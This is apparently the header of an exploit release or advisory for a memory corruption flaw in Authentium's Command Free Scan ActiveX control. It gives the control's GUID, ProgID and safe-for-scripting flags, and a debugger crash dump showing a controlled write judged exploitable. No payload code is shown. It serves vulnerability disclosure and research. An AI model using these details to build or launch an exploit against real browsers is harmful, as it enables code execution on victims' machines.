Authentium Command Free Scan ActiveX Control Memory corruption Exploit

Author: Nikolas Sotiriu (lofi) Advisory: http://www.sotiriu.de/adv/NSOADV-2010-xxx.txt Use it only for education or ethical pentesting! The author accepts no liability for damage caused by this tool.

ActiveX Control Informations:

Name: CSS Web Installer Class Prog ID: CSSWEBLib.Installer Vendor: Authentium, Inc. Type: ActiveX-Control Version: 1.4.9508.605 GUID: {6CCE3920-3183-4B3D-808A-B12EB769DE12} File: cssweb.dll Folder: C:\WINDOWS\Downloaded Program Files\ Safe for Script: True Safe for Init: True IObjectSafety: False

Test Informations:

- Windows XP SP3 IE7 Ger

M$ Exploitablitiy Informations

(158.968): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=7efefefe ebx=02695140 ecx=02695180 edx=41414141 esi=02695140 edi=42424242 eip=1000c1a9 esp=0194b414 ebp=0194b4e0 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\Downloaded Program Files\cssweb.dll - cssweb!DllUnregisterServer+0x37a3: 1000c1a9 8917 mov dword ptr [edi],edx ds:0023:42424242=???????? Missing image name, possible paged-out or corrupt data. Missing image name, possible paged-out or corrupt data. Missing image name, possible paged-out or corrupt data. 0:005> !exploitable -v HostMachine\HostUser Executing Processor Architecture is x86 Debuggee is in User Mode Debuggee is a live user mode debugging session on the local machine Event Type: Exception Exception Faulting Address: 0x42424242 First Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005) Exception Sub-Type: Write Access Violation Exception Hash (Major/Minor): 0x223e0447.0x22676030 Stack Trace: cssweb!DllUnregisterServer+0x37a3 cssweb!DllUnregisterServer+0x22d8 mshtml!CFontCache::GetBaseCcs+0x1bd mshtml!CStr::Set+0x1b mshtml!COneRun::Clone+0x87 Instruction Address: 0x000000001000c1a9 Description: User Mode Write AV Short Description: WriteAV Exploitability Classification: EXPLOITABLE Recommended Bug Title: Exploitable - User Mode Write AV starting at cssweb!DllUnregisterServer+0x00000000000037a3 (Hash=0x223e0447.0x22676030) User mode write access violations that are not near NULL are exploitable.